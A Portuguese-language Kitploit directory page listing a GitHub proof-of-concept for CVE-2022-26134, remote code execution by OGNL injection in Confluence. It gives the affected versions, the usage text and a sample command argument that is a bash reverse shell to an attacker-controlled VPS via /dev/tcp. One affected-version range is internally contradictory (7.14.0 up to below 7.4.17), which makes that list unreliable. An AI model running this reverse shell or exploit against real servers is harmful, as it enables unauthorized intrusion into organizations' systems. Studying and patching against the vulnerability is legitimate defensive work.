Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134 — Um atacante remoto, sem autenticação no Confluence, pode construir expressões OGNL para injetar e executar código arbitrário no Confluence Server ou Data Center. O PoC foi modificado em um script existente para facilitar o getshell. | Kitploit
Ferramentas/GitHubGitHub/keven1z/cve-2022-26134
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e Controle
GitHubkeven1z/cve-2022-26134

CVE-2022-26134

Um atacante remoto, sem autenticação no Confluence, pode construir expressões OGNL para injetar e executar código arbitrário no Confluence Server ou Data Center. O PoC foi modificado em um script existente para facilitar o getshell.

Ver Repositório
7há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26134

Atacantes remotos não autenticados podem construir expressões OGNL para injeção, executar código arbitrário no Confluence Server ou Data Center, POC modificado para facilitar a obtenção de shell. Porta comum: 8090

Versões afetadas

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

Instruções de uso

root@kitploit:~
pip3 install requests
root@kitploit:~
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL alvo
  -c COMMAND, --command COMMAND
                        Comando a executar, get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1

Uso

root@kitploit:~
python3 CVE-2022-26134.py -t [IP do servidor] -c [comando] //executar comando

Este script é apenas para fins de teste, não use para outros fins.

Baixar ferramenta